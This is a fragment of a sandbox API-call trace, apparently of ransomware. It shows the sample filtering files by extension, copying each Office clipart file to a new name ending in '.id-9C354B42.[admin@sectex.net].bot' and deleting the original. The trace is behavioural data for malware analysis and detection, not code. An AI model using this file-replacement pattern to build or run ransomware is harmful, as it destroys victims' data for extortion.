	[0159.183] lstrlenW (lpString=".zip") returned 4
	[0159.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.184] lstrlenW (lpString=".rar") returned 4
	[0159.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.184] lstrlenW (lpString=".bz2") returned 4
	[0159.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.184] lstrlenW (lpString=".7z") returned 3
	[0159.184] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.184] lstrlenW (lpString=".dbf") returned 4
	[0159.184] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.184] lstrlenW (lpString=".1cd") returned 4
	[0159.184] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned 63
	[0159.184] lstrlenW (lpString=".jpg") returned 4
	[0159.184] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.184] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.184] lstrlenW (lpString="J0105600.WMF") returned 12
	[0159.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.188] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=8680) returned 1
	[0159.188] CloseHandle (hObject=0x1b4) returned 1
	[0159.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf")) returned 0x20
	[0159.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.189] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.189] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.190] GetLastError () returned 0x0
	[0159.190] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x21e8, lpOverlapped=0x0) returned 1
	[0159.207] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x21f0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x21f0, lpOverlapped=0x0) returned 1
	[0159.208] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.208] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.208] SetEndOfFile (hFile=0x25c) returned 1
	[0159.208] CloseHandle (hObject=0x25c) returned 1
	[0159.208] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.208] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.211] CloseHandle (hObject=0x1b4) returned 1
	[0159.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.211] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf")) returned 1
	[0159.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.212] lstrlenW (lpString=".doc") returned 4
	[0159.212] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.212] lstrlenW (lpString=".docx") returned 5
	[0159.212] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.212] lstrlenW (lpString=".pdf") returned 4
	[0159.212] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.212] lstrlenW (lpString=".xls") returned 4
	[0159.212] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.212] lstrlenW (lpString=".xlsx") returned 5
	[0159.212] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.212] lstrlenW (lpString=".ppt") returned 4
	[0159.212] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.212] lstrlenW (lpString=".zip") returned 4
	[0159.212] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.212] lstrlenW (lpString=".rar") returned 4
	[0159.212] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.212] lstrlenW (lpString=".bz2") returned 4
	[0159.212] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.212] lstrlenW (lpString=".7z") returned 3
	[0159.212] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.212] lstrlenW (lpString=".dbf") returned 4
	[0159.212] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.213] lstrlenW (lpString=".1cd") returned 4
	[0159.213] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.213] lstrlenW (lpString=".jpg") returned 4
	[0159.213] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.213] lstrlenW (lpString=".doc") returned 4
	[0159.213] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.213] lstrlenW (lpString=".docx") returned 5
	[0159.213] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.213] lstrlenW (lpString=".pdf") returned 4
	[0159.213] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.213] lstrlenW (lpString=".xls") returned 4
	[0159.213] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.213] lstrlenW (lpString=".xlsx") returned 5
	[0159.213] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.213] lstrlenW (lpString=".ppt") returned 4
	[0159.213] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.213] lstrlenW (lpString=".zip") returned 4
	[0159.213] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.213] lstrlenW (lpString=".rar") returned 4
	[0159.213] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.213] lstrlenW (lpString=".bz2") returned 4
	[0159.213] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.213] lstrlenW (lpString=".7z") returned 3
	[0159.213] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.213] lstrlenW (lpString=".dbf") returned 4
	[0159.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.214] lstrlenW (lpString=".1cd") returned 4
	[0159.214] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned 63
	[0159.214] lstrlenW (lpString=".jpg") returned 4
	[0159.214] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.214] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.214] lstrlenW (lpString="J0105638.WMF") returned 12
	[0159.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.215] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=10364) returned 1
	[0159.215] CloseHandle (hObject=0x1b4) returned 1
	[0159.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf")) returned 0x20
	[0159.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.216] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.216] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.216] GetLastError () returned 0x0
	[0159.216] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x287c, lpOverlapped=0x0) returned 1
	[0159.218] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2880, lpOverlapped=0x0) returned 1
	[0159.219] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.219] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.219] SetEndOfFile (hFile=0x25c) returned 1
	[0159.219] CloseHandle (hObject=0x25c) returned 1
	[0159.220] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.220] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.222] CloseHandle (hObject=0x1b4) returned 1
	[0159.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf")) returned 1
	[0159.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.223] lstrlenW (lpString=".doc") returned 4
	[0159.223] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.223] lstrlenW (lpString=".docx") returned 5
	[0159.223] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.223] lstrlenW (lpString=".pdf") returned 4
	[0159.223] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.223] lstrlenW (lpString=".xls") returned 4
	[0159.223] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.223] lstrlenW (lpString=".xlsx") returned 5
	[0159.223] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.223] lstrlenW (lpString=".ppt") returned 4
	[0159.223] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.223] lstrlenW (lpString=".zip") returned 4
	[0159.223] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.223] lstrlenW (lpString=".rar") returned 4
	[0159.223] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.223] lstrlenW (lpString=".bz2") returned 4
	[0159.223] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.223] lstrlenW (lpString=".7z") returned 3
	[0159.223] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.224] lstrlenW (lpString=".dbf") returned 4
	[0159.224] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.224] lstrlenW (lpString=".1cd") returned 4
	[0159.224] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.224] lstrlenW (lpString=".jpg") returned 4
	[0159.224] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.224] lstrlenW (lpString=".doc") returned 4
	[0159.224] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString=".docx") returned 5
	[0159.224] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.224] lstrlenW (lpString=".pdf") returned 4
	[0159.224] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString=".xls") returned 4
	[0159.224] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.224] lstrlenW (lpString=".xlsx") returned 5
	[0159.224] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.224] lstrlenW (lpString=".ppt") returned 4
	[0159.224] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.224] lstrlenW (lpString=".zip") returned 4
	[0159.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.224] lstrlenW (lpString=".rar") returned 4
	[0159.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString=".bz2") returned 4
	[0159.224] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.224] lstrlenW (lpString=".7z") returned 3
	[0159.224] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.225] lstrlenW (lpString=".dbf") returned 4
	[0159.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.225] lstrlenW (lpString=".1cd") returned 4
	[0159.225] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned 63
	[0159.225] lstrlenW (lpString=".jpg") returned 4
	[0159.225] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.225] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.225] lstrlenW (lpString="J0105710.WMF") returned 12
	[0159.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.226] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13808) returned 1
	[0159.226] CloseHandle (hObject=0x1b4) returned 1
	[0159.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf")) returned 0x20
	[0159.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.226] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.226] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.227] GetLastError () returned 0x0
	[0159.227] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x35f0, lpOverlapped=0x0) returned 1
	[0159.229] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3600, lpOverlapped=0x0) returned 1
	[0159.230] ReadFile (in: hFile=0x1b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.230] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.230] SetEndOfFile (hFile=0x25c) returned 1
	[0159.230] CloseHandle (hObject=0x25c) returned 1
	[0159.230] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.230] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.233] CloseHandle (hObject=0x1b4) returned 1
	[0159.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf")) returned 1
	[0159.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.234] lstrlenW (lpString=".doc") returned 4
	[0159.234] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.234] lstrlenW (lpString=".docx") returned 5
	[0159.234] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.234] lstrlenW (lpString=".pdf") returned 4
	[0159.234] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.234] lstrlenW (lpString=".xls") returned 4
	[0159.234] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.234] lstrlenW (lpString=".xlsx") returned 5
	[0159.234] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.234] lstrlenW (lpString=".ppt") returned 4
	[0159.234] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.234] lstrlenW (lpString=".zip") returned 4
	[0159.234] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.234] lstrlenW (lpString=".rar") returned 4
	[0159.234] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.234] lstrlenW (lpString=".bz2") returned 4
	[0159.234] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.234] lstrlenW (lpString=".7z") returned 3
	[0159.234] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.234] lstrlenW (lpString=".dbf") returned 4
	[0159.234] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.234] lstrlenW (lpString=".1cd") returned 4
	[0159.234] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.235] lstrlenW (lpString=".jpg") returned 4
	[0159.235] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.235] lstrlenW (lpString=".doc") returned 4
	[0159.235] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.235] lstrlenW (lpString=".docx") returned 5
	[0159.235] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.235] lstrlenW (lpString=".pdf") returned 4
	[0159.235] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.235] lstrlenW (lpString=".xls") returned 4
	[0159.235] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.235] lstrlenW (lpString=".xlsx") returned 5
	[0159.235] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.235] lstrlenW (lpString=".ppt") returned 4
	[0159.235] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned 63
	[0159.235] lstrlenW (lpString=".zip") returned 4
	[0159.235] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.235] lstrlenW (lpString=".rar") returned 4
	[0159.235] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.235] lstrlenW (lpString=".bz2") returned 4
	[0159.235] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.235] lstrlenW (lpString=".7z") returned 3
	[0159.235] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
